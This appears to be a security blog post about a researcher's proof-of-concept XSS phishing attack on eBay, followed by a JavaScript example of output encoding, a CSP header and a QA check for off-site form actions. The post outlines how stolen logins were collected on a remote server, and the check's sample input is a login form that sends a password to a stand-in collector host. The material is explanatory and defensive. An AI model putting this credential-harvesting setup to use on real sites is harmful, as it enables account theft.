Online e-commerce has become the rage. Millions of people worldwide are doing their shopping on the various online platforms. But even enormous e-commerce platforms like eBay are not immune to cybercrime, as security researcher MLT demonstrated recently. The culprit this time was Cross Site Scripting (XSS), a common application layer vulnerability that obviously was not detected/remediated during development.
What was stolen?
The way it looks right now, nothing was stolen. Security researcher MLT recently demonstrated on his blog how easy it was to execute phishing attacks on eBay. Luckily for eBay and its 159 million active users, this vulnerability was not used maliciously for real attacks. As far as we know, the ethical hacker has only exploited this flaw as a POC.
How was the POC attack on eBay executed?
The method used to perform this POC was Cross Site Scripting (XSS). XSS is probably at the top of the list when looking at vulnerability exploits used in the wild. The idea is very simple. Make the users think that they are looking at the regular login page while they are actually punching in their credentials in a form that is injected by a third party. All data is collected on a remote command and control server.
Here is how the attack was performed. MLT did the following things:
1 – Used WebHTTrack, dedicated mirroring software, to duplicate the eBay interface.
2 – Changed the login form inputs for the page and directed them to his PHP script.
3 – Created a malicious PHP script (payload) to execute the attack properly.
4 – Made sure all permissions were properly set up and tested everything locally.
Once the victim entered his credentials on the phishing page, a GET request was made to log.php on MLT’s server and the inputted details were written to log.txt in plaintext format.
MLT’s eBay hacking POC. Courtesy: www.ret2libc.wordpress.com
eBay initially took their time to process the POC that was sent to them by MLT in December 2015. But the issue was eventually patched and eBay can’t be hacked this way anymore. As mentioned earlier in this post, there have been no known live attacks exploiting this vulnerability. However, it is crucial for vendors to address such issues as early as possible and avoid potential attacks on their users and platforms.
XSS is an application layer vulnerability that can be eradicated during the development process. This can ideally be done by integrating security into the developer’s environment and automating the whole process. In other words, the organization should ideally create a secure Software Development Life Cycle (sSDLC), where security issues are treated like QA bugs and eliminated on-the-go.
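To make the development-time fix concrete, here is an added example (not code from MLT's post or from eBay) that shows a reflecting template beside its output-encoded form, a Content-Security-Policy that keeps form submissions on the site's own origin, and a small check that could run in QA. The results page, both origins, and all function names are assumptions made for illustration.

```javascript
// Added example: hypothetical page renderer and check, not eBay's code.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for an HTML text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: reflects the request parameter into markup unchanged.
function renderUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: the same template with output encoding applied.
function renderSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Defense in depth: header value limiting scripts, frames and form
// targets to the site's own origin.
function cspHeader() {
  return ["default-src 'self'", "script-src 'self'", "frame-src 'self'",
          "form-action 'self'", "base-uri 'none'"].join('; ');
}

// QA check: list form targets in rendered HTML that leave the allowed origin.
function foreignFormActions(html, allowedOrigin) {
  const found = [];
  const re = /<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const target = new URL(m[1], allowedOrigin); // resolves relative actions too
    if (target.origin !== allowedOrigin) found.push(target.href);
  }
  return found;
}

// Constructed sample input: markup for a look-alike login form posting off-site.
const SAMPLE = '<form action="https://collector.example/log.php"><input name="pass"></form>';
const ORIGIN = 'https://shop.example'; // assumed site origin

console.log(foreignFormActions(renderUnsafe(SAMPLE), ORIGIN)); // off-site target found
console.log(foreignFormActions(renderSafe(SAMPLE), ORIGIN));   // nothing rendered as a form
console.log(cspHeader());
```

Treating the `foreignFormActions` result as a failing test in the build pipeline is one way to handle this class of issue like any other QA bug.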
Besides the obvious benefit of avoiding post-release embarrassments (best case) and hacking incidents (worst case), implementing automated solutions such as Static Code Analysis (SCA) allows improved ROI, better security awareness amongst developers and less inter-department (security staff, development teams, management) friction within the organization.